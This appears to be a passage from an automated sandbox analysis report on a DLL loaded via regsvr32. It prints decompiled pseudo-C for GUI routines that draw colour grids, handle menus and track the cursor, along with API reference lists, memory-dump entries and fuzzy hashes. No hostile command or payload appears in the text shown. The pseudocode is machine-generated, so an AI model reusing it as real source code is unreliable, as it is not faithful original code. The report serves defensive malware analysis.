                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000B18F
                                                                                                                  • Part of subcall function 1000B053: __EH_prolog3.LIBCMT ref: 1000B05A
                                                                                                                • lstrlenW.KERNEL32(?,0000005C), ref: 1000B1EF
                                                                                                                • CopyFileA.KERNEL32 ref: 1000B2E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMetalstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3994854817-0
                                                                                                                • Opcode ID: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
                                                                                                                • Instruction ID: d9942445a5f91e600a185d9f565c7297f21d3a8cdeceab250ee44f312beabf7e
                                                                                                                • Opcode Fuzzy Hash: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
                                                                                                                • Instruction Fuzzy Hash: DB818CB5900A06AFEB20CFA4CD8896EBBF9FF453847618519F46AD7658D730EC11CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001073 Relevance: 13.7, APIs: 9, Instructions: 203COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10001073(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* __ebp;
				signed int _t105;
				signed int _t120;
				intOrPtr _t123;
				signed int _t125;
				long _t127;
				intOrPtr _t140;
				void* _t154;
				void* _t158;
				void* _t159;
				signed int _t163;
				int _t164;
				intOrPtr _t171;
				signed int _t183;
				signed int _t185;
				short _t187;
				void* _t188;
				intOrPtr _t192;
				RECT* _t193;
				void* _t195;
				signed int _t197;
				void* _t199;
				signed long long* _t200;
				void* _t202;
				void* _t209;
				signed long long _t211;

				_t209 = __fp0;
				_t202 = __eflags;
				_t200 = _t199 - 0x74;
				_t197 = _t200 - 4;
				_t105 =  *0x100b9e70; // 0xbb35530
				 *(_t197 + 0x74) = _t105 ^ _t197;
				_push(0x70);
				E1004764D(0x1008dca6, __ebx, __edi, __esi);
				_t158 = __ecx;
				_push(__ecx);
				L1000CE8D(__ecx, _t197 + 0x20, __edi, __esi, _t202);
				 *(_t197 - 4) = 0;
				GetClientRect( *(_t158 + 0x20), _t197 - 0x54);
				_push(GetSysColor(0xf));
				E1000D544(_t158, _t197 - 0x28, __edi, 0, _t202);
				 *(_t197 - 4) = 1;
				FrameRect( *(_t197 + 0x24), _t197 - 0x54,  *(_t197 - 0x24));
				asm("cdq");
				_t163 = 0x18;
				_t185 = 0x18;
				 *((intOrPtr*)(_t197 - 0x18)) = 0x7fff;
				 *_t197 = 0;
				 *((intOrPtr*)(_t197 + 0x14)) = 0;
				_t164 = ( *((intOrPtr*)(_t197 - 0x4c)) -  *(_t197 - 0x54)) / _t163;
				_t120 =  *((intOrPtr*)(_t197 - 0x48)) -  *((intOrPtr*)(_t197 - 0x50));
				 *(_t197 - 0x44) = _t164;
				asm("cdq");
				_t183 = _t120 % _t185;
				 *(_t197 - 0x10) = _t120 / _t185;
				_t123 = 1;
				 *((intOrPtr*)(_t197 - 0x64)) = 1;
				 *((intOrPtr*)(_t197 - 0x5c)) = _t164 + 1;
				 *((intOrPtr*)(_t197 + 0x10)) = 1;
				while(1) {
					asm("fild dword [ebp]");
					 *((intOrPtr*)(_t197 - 0x60)) = _t123;
					 *((intOrPtr*)(_t197 - 0x58)) = _t123 +  *(_t197 - 0x10);
					_t211 = (_t209 +  *0x10099e70) *  *0x10099e60;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t125 = E10048990(_t123 +  *(_t197 - 0x10), _t211);
					_t192 =  *((intOrPtr*)(_t197 + 0x14));
					 *(_t197 - 0x14) = _t125;
					asm("fild dword [ebp-0x14]");
					 *(_t197 - 0x6c) = _t211;
					 *(_t197 + 0x1c) =  *(_t197 + 0x1c) & 0x00000000;
					 *(_t197 - 0x2c) = _t125 * _t125;
					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					do {
						_t187 =  *(_t158 + 0x74);
						_t127 = ColorHLSToRGB( *(_t197 + 0x1c), _t187,  *(_t197 - 0x14));
						 *(_t192 +  *((intOrPtr*)(_t158 + 0x58))) = _t127;
						 *(_t197 - 0x38) = _t127;
						E1001FBA9(_t197 + 0x20, _t197 - 0x7c, _t127);
						ColorRGBToHLS( *(_t158 + 0x70), _t197 + 0xc, _t197 + 8, _t197 + 0x18);
						 *(_t197 + 4) = ( *(_t197 + 0xc) & 0x0000ffff) -  *(_t197 + 0x1c);
						 *((intOrPtr*)(_t197 - 0x1c)) = ( *(_t197 + 8) & 0x0000ffff) - _t187;
						asm("fild dword [ebp-0x1c]");
						 *(_t197 - 0x20) = _t211;
						_t171 = ( *(_t197 + 0x18) & 0x0000ffff) * ( *(_t197 + 0x18) & 0x0000ffff) +  *(_t197 - 0x2c);
						 *((intOrPtr*)(_t197 - 0x30)) = _t171;
						asm("fild dword [ebp-0x30]");
						_push(_t171);
						 *(_t197 - 0x34) = _t211;
						asm("fild dword [ebp+0x4]");
						 *_t200 = _t211 *  *0x10099e50;
						E100487D0(_t183, _t171);
						 *(_t197 + 4) =  *(_t197 + 0x18) & 0x0000ffff;
						asm("fild dword [ebp+0x4]");
						asm("fmulp st1, st0");
						asm("fsubr qword [ebp-0x34]");
						_t211 =  *(_t197 - 0x20) *  *(_t197 - 0x20);
						asm("faddp st1, st0");
						_t140 = E10048990( *(_t197 + 0x18) & 0x0000ffff, _t211);
						if(_t140 <  *((intOrPtr*)(_t197 - 0x18))) {
							_t187 = _t158 + 0x60;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *((intOrPtr*)(_t197 - 0x18)) = _t140;
							asm("movsd");
							_t192 =  *((intOrPtr*)(_t197 + 0x14));
							 *(_t158 + 0x5c) =  *(_t197 - 0x38);
						}
						OffsetRect(_t197 - 0x7c,  *(_t197 - 0x44), 0);
						 *(_t197 + 0x1c) =  *(_t197 + 0x1c) + 0xa;
						_t192 = _t192 + 4;
						 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					} while ( *(_t197 + 0x1c) < 0xf0);
					 *_t197 =  *_t197 + 1;
					 *((intOrPtr*)(_t197 + 0x10)) =  *((intOrPtr*)(_t197 + 0x10)) +  *(_t197 - 0x10);
					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					if(_t192 < 0x900) {
						_t123 =  *((intOrPtr*)(_t197 + 0x10));
						continue;
					}
					_t193 = _t158 + 0x60;
					InflateRect(_t193, 1, 1);
					_push(((0 |  *(_t158 + 0x74) - 0x000000d2 <= 0x00000000) - 0x00000001 & 0xff64c8c9) + 0xffffff);
					E1000D544(_t158, _t197 - 0x40, _t187, _t193,  *(_t158 + 0x74) - 0xd2);
					FrameRect( *(_t197 + 0x24), _t193,  *(_t197 - 0x3c));
					 *((intOrPtr*)(_t197 - 0x40)) = 0x10098308;
					L1000CFF6(_t197 - 0x40);
					 *(_t197 - 4) = 0;
					 *((intOrPtr*)(_t197 - 0x28)) = 0x10098308;
					L1000CFF6(_t197 - 0x28);
					 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
					_t154 = L1000CEE1(_t158, _t197 + 0x20, _t187, 0x10098308,  *(_t158 + 0x74) - 0xd2);
					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
					_pop(_t188);
					_pop(_t195);
					_pop(_t159);
					return E1004763E(_t154, _t159,  *(_t197 + 0x74) ^ _t197, _t183, _t188, _t195);
				}
			}





























                                                                                                                0x10001073
                                                                                                                0x10001073
                                                                                                                0x100096b4
                                                                                                                0x100096b7
                                                                                                                0x100096bb
                                                                                                                0x100096c2
                                                                                                                0x100096c5
                                                                                                                0x100096cc
                                                                                                                0x100096d1
                                                                                                                0x100096d3
                                                                                                                0x100096d7
                                                                                                                0x100096e5
                                                                                                                0x100096e8
                                                                                                                0x100096f6
                                                                                                                0x100096fa
                                                                                                                0x10009709
                                                                                                                0x1000970d
                                                                                                                0x1000971b
                                                                                                                0x1000971c
                                                                                                                0x10009721
                                                                                                                0x10009722
                                                                                                                0x10009729
                                                                                                                0x1000972c
                                                                                                                0x1000972f
                                                                                                                0x10009734
                                                                                                                0x10009737
                                                                                                                0x1000973a
                                                                                                                0x1000973b
                                                                                                                0x1000973d
                                                                                                                0x10009742
                                                                                                                0x10009744
                                                                                                                0x10009747
                                                                                                                0x1000974a
                                                                                                                0x10009752
                                                                                                                0x10009755
                                                                                                                0x10009758
                                                                                                                0x10009763
                                                                                                                0x1000976c
                                                                                                                0x10009772
                                                                                                                0x10009773
                                                                                                                0x10009774
                                                                                                                0x10009775
                                                                                                                0x10009776
                                                                                                                0x1000977b
                                                                                                                0x1000977e
                                                                                                                0x10009784
                                                                                                                0x10009787
                                                                                                                0x1000978a
                                                                                                                0x1000978e
                                                                                                                0x10009791
                                                                                                                0x10009794
                                                                                                                0x10009797
                                                                                                                0x1000979e
                                                                                                                0x100097a7
                                                                                                                0x100097ab
                                                                                                                0x100097b5
                                                                                                                0x100097c9
                                                                                                                0x100097d6
                                                                                                                0x100097df
                                                                                                                0x100097e6
                                                                                                                0x100097ee
                                                                                                                0x100097f1
                                                                                                                0x100097f4
                                                                                                                0x100097f7
                                                                                                                0x100097fa
                                                                                                                0x100097fc
                                                                                                                0x100097ff
                                                                                                                0x10009808
                                                                                                                0x1000980b
                                                                                                                0x10009814
                                                                                                                0x10009819
                                                                                                                0x10009821
                                                                                                                0x10009823
                                                                                                                0x10009829
                                                                                                                0x1000982c
                                                                                                                0x1000982e
                                                                                                                0x10009836
                                                                                                                0x10009838
                                                                                                                0x1000983e
                                                                                                                0x1000983f
                                                                                                                0x10009840
                                                                                                                0x10009841
                                                                                                                0x10009847
                                                                                                                0x10009848
                                                                                                                0x1000984b
                                                                                                                0x1000984b
                                                                                                                0x10009857
                                                                                                                0x1000985d
                                                                                                                0x10009861
                                                                                                                0x1000986b
                                                                                                                0x1000986b
                                                                                                                0x10009877
                                                                                                                0x1000987a
                                                                                                                0x10009883
                                                                                                                0x10009886
                                                                                                                0x1000974f
                                                                                                                0x00000000
                                                                                                                0x1000974f
                                                                                                                0x10009890
                                                                                                                0x10009894
                                                                                                                0x100098b4
                                                                                                                0x100098b5
                                                                                                                0x100098c1
                                                                                                                0x100098cf
                                                                                                                0x100098d2
                                                                                                                0x100098da
                                                                                                                0x100098de
                                                                                                                0x100098e1
                                                                                                                0x100098e6
                                                                                                                0x100098ed
                                                                                                                0x100098f5
                                                                                                                0x100098fd
                                                                                                                0x100098fe
                                                                                                                0x100098ff
                                                                                                                0x1000990e
                                                                                                                0x1000990e

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100096CC
                                                                                                                  • Part of subcall function 1000CE8D: __EH_prolog3.LIBCMT ref: 1000CE94
                                                                                                                  • Part of subcall function 1000CE8D: BeginPaint.USER32(?,?), ref: 1000CEC0
                                                                                                                • GetClientRect.USER32 ref: 100096E8
                                                                                                                • GetSysColor.USER32 ref: 100096F0
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • FrameRect.USER32 ref: 1000970D
                                                                                                                • ColorHLSToRGB.SHLWAPI(00000000,?,?), ref: 1000979E
                                                                                                                  • Part of subcall function 1001FBA9: SetBkColor.GDI32(?,00000000), ref: 1001FBCA
                                                                                                                  • Part of subcall function 1001FBA9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 1001FBDE
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,00007FFF), ref: 100097C9
                                                                                                                • OffsetRect.USER32 ref: 10009857
                                                                                                                • InflateRect.USER32 ref: 10009894
                                                                                                                • FrameRect.USER32 ref: 100098C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Color$H_prolog3$Frame$BeginBrushClientCreateInflateOffsetPaintSolidText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1932886356-0
                                                                                                                • Opcode ID: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
                                                                                                                • Instruction ID: 22ac6c9c8fa047b02607a05c21a63767090b59be9aa7f4c1786ea2e733ae0667
                                                                                                                • Opcode Fuzzy Hash: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
                                                                                                                • Instruction Fuzzy Hash: A6813572D00219EFDF04DFA4C985AEEBBB5FF08310F11412AF816AA251DB75AA15CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003603A Relevance: 13.6, APIs: 9, Instructions: 142windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003603A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				intOrPtr* _t53;
				struct HMENU__* _t57;
				int _t58;
				int _t59;
				struct HMENU__* _t60;
				int _t62;
				int _t64;
				signed int _t66;
				int _t67;
				struct HMENU__* _t68;
				int _t70;
				intOrPtr* _t74;
				intOrPtr* _t75;
				int _t76;
				int _t77;
				struct HMENU__* _t87;
				intOrPtr _t89;

				_t78 = __ecx;
				_t75 = __ecx;
				_v8 = __ecx;
				_t52 = E10021CE5( *((intOrPtr*)(__ecx + 0x20)));
				if(_a12 == 0) {
					_t53 = __ecx + 0x80;
					_t89 = _a4;
					if( *_t53 == 0) {
						L3:
						_t94 = _t89;
						if(_t89 == 0) {
							E1000A069(_t75, _t78, 0, _t89, _t94);
						}
						E10010B4E( &_v48);
						_v36 = _t89;
						if( *((intOrPtr*)(E1001DD4F(_t75, 0, _t89, _t94) + 0x78)) !=  *(_t89 + 4)) {
							_t57 = GetMenu( *(_t75 + 0x20));
							__eflags = _t57;
							if(_t57 == 0) {
								goto L16;
							}
							_t82 = _t75;
							_t68 = E10015912(_t75, _t75, GetMenu);
							__eflags = _t68;
							if(_t68 == 0) {
								goto L16;
							}
							_t87 = GetMenu( *(_t68 + 0x20));
							__eflags = _t87;
							if(_t87 == 0) {
								goto L16;
							}
							_t70 = GetMenuItemCount(_t87);
							_t77 = 0;
							__eflags = _t70;
							_a12 = _t70;
							if(_t70 <= 0) {
								L15:
								_t75 = _v8;
								goto L16;
							} else {
								goto L11;
							}
							while(1) {
								L11:
								__eflags = GetSubMenu(_t87, _t77) -  *(_t89 + 4);
								if(__eflags == 0) {
									break;
								}
								_t77 = _t77 + 1;
								__eflags = _t77 - _a12;
								if(_t77 < _a12) {
									continue;
								}
								goto L15;
							}
							_push(_t87);
							_v12 = E1001E527(_t77, _t82, _t87, _t89, __eflags);
							goto L15;
						} else {
							_v12 = _t89;
							L16:
							_t58 = GetMenuItemCount( *(_t89 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t58;
							if(_t58 <= 0) {
								L36:
								return _t58;
							}
							do {
								_t59 = GetMenuItemID( *(_t89 + 4), _v40);
								_v44 = _t59;
								if(_t59 == 0) {
									goto L35;
								}
								if(_t59 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t75 + 0x54);
									if( *(_t75 + 0x54) == 0) {
										L27:
										_t60 = 0;
										__eflags = 0;
										L28:
										_push(_t60);
										L29:
										_push(_t75);
										E10010B74( &_v48);
										_t62 = GetMenuItemCount( *(_t89 + 4));
										_t76 = _t62;
										if(_t76 >= _v16) {
											L34:
											_v16 = _t76;
											_t75 = _v8;
											goto L35;
										}
										_v40 = _v40 + _t62 - _v16;
										while(_v40 < _t76) {
											_t64 = GetMenuItemID( *(_t89 + 4), _v40);
											__eflags = _t64 - _v44;
											if(_t64 != _v44) {
												goto L34;
											}
											_t43 =  &_v40;
											 *_t43 = _v40 + 1;
											__eflags =  *_t43;
										}
										goto L34;
									}
									__eflags = _t59 - 0xf000;
									if(_t59 >= 0xf000) {
										goto L27;
									}
									_t60 = 1;
									goto L28;
								}
								_t66 = E1001276D(_t89, _v40);
								_v32 = _t66;
								if(_t66 == 0) {
									goto L35;
								}
								_t67 = GetMenuItemID( *(_t66 + 4), 0);
								_v44 = _t67;
								if(_t67 != 0 && _t67 != 0xffffffff) {
									_push(0);
									goto L29;
								}
								L35:
								_v40 = _v40 + 1;
								_t58 = _v40;
							} while (_t58 < _v16);
							goto L36;
						}
					}
					_t74 =  *_t53;
					_t78 = _t74;
					_t58 =  *((intOrPtr*)( *_t74 + 0x74))(_t89, _a8, 0);
					if(_t58 != 0) {
						goto L36;
					}
					goto L3;
				}
				return _t52;
			}

































                                                                                                                0x1003603a
                                                                                                                0x10036041
                                                                                                                0x10036047
                                                                                                                0x1003604a
                                                                                                                0x10036054
                                                                                                                0x1003605a
                                                                                                                0x10036063
                                                                                                                0x10036066
                                                                                                                0x1003607e
                                                                                                                0x1003607e
                                                                                                                0x10036080
                                                                                                                0x10036082
                                                                                                                0x10036082
                                                                                                                0x1003608a
                                                                                                                0x1003608f
                                                                                                                0x1003609d
                                                                                                                0x100360ad
                                                                                                                0x100360af
                                                                                                                0x100360b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360b3
                                                                                                                0x100360b5
                                                                                                                0x100360ba
                                                                                                                0x100360bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360c3
                                                                                                                0x100360c5
                                                                                                                0x100360c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360ca
                                                                                                                0x100360d0
                                                                                                                0x100360d2
                                                                                                                0x100360d4
                                                                                                                0x100360d7
                                                                                                                0x100360f7
                                                                                                                0x100360f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360d9
                                                                                                                0x100360d9
                                                                                                                0x100360e1
                                                                                                                0x100360e4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360e6
                                                                                                                0x100360e7
                                                                                                                0x100360ea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100360ec
                                                                                                                0x100360ee
                                                                                                                0x100360f4
                                                                                                                0x00000000
                                                                                                                0x1003609f
                                                                                                                0x1003609f
                                                                                                                0x100360fa
                                                                                                                0x100360fd
                                                                                                                0x10036103
                                                                                                                0x10036109
                                                                                                                0x1003610c
                                                                                                                0x100361bc
                                                                                                                0x00000000
                                                                                                                0x100361bc
                                                                                                                0x10036118
                                                                                                                0x1003611e
                                                                                                                0x10036122
                                                                                                                0x10036125
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003612e
                                                                                                                0x10036158
                                                                                                                0x1003615c
                                                                                                                0x10036160
                                                                                                                0x1003616e
                                                                                                                0x1003616e
                                                                                                                0x1003616e
                                                                                                                0x10036170
                                                                                                                0x10036170
                                                                                                                0x10036171
                                                                                                                0x10036171
                                                                                                                0x10036175
                                                                                                                0x1003617d
                                                                                                                0x10036183
                                                                                                                0x10036188
                                                                                                                0x100361a7
                                                                                                                0x100361a7
                                                                                                                0x100361aa
                                                                                                                0x00000000
                                                                                                                0x100361aa
                                                                                                                0x1003618d
                                                                                                                0x100361a2
                                                                                                                0x10036198
                                                                                                                0x1003619a
                                                                                                                0x1003619d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003619f
                                                                                                                0x1003619f
                                                                                                                0x1003619f
                                                                                                                0x1003619f
                                                                                                                0x00000000
                                                                                                                0x100361a2
                                                                                                                0x10036162
                                                                                                                0x10036167
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003616b
                                                                                                                0x00000000
                                                                                                                0x1003616b
                                                                                                                0x10036135
                                                                                                                0x1003613c
                                                                                                                0x1003613f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036146
                                                                                                                0x1003614a
                                                                                                                0x1003614d
                                                                                                                0x10036154
                                                                                                                0x00000000
                                                                                                                0x10036154
                                                                                                                0x100361ad
                                                                                                                0x100361ad
                                                                                                                0x100361b0
                                                                                                                0x100361b3
                                                                                                                0x00000000
                                                                                                                0x10036118
                                                                                                                0x1003609d
                                                                                                                0x10036068
                                                                                                                0x10036070
                                                                                                                0x10036073
                                                                                                                0x10036078
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036078
                                                                                                                0x100361c0

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021CE5: GetFocus.USER32 ref: 10021CE6
                                                                                                                  • Part of subcall function 10021CE5: GetParent.USER32(00000000), ref: 10021D0F
                                                                                                                  • Part of subcall function 10021CE5: GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
                                                                                                                  • Part of subcall function 10021CE5: GetParent.USER32(?), ref: 10021D38
                                                                                                                  • Part of subcall function 10021CE5: GetDesktopWindow.USER32 ref: 10021D3C
                                                                                                                  • Part of subcall function 10021CE5: SendMessageA.USER32 ref: 10021D50
                                                                                                                • GetMenu.USER32 ref: 100360AD
                                                                                                                • GetMenu.USER32 ref: 100360C1
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 100360CA
                                                                                                                • GetSubMenu.USER32 ref: 100360DB
                                                                                                                • GetMenuItemCount.USER32(?), ref: 100360FD
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 1003611E
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 10036146
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1003617D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 10036198
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 4186786570-0
                                                                                                                • Opcode ID: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
                                                                                                                • Instruction ID: 46843a0fe4c7dd88824f739b3fce7bef7ece51828467e3b86497c45affe004c6
                                                                                                                • Opcode Fuzzy Hash: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
                                                                                                                • Instruction Fuzzy Hash: 3E516A35900209DFDB12DFA4CD85A9EBBF5FF4C382F258565E816AA162DB31ED40DB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10042CE7 Relevance: 13.6, APIs: 9, Instructions: 130timekeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10042CE7(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t91 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E1001E375(_t72, _t76, _t84, _t89, _t91);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E10015912(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E10016A68(_t75, _t89, _t85) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t94 = _t75;
					if(_t75 == 0) {
						E1000A069(_t75, _t81, _t85, _t89, _t94);
					}
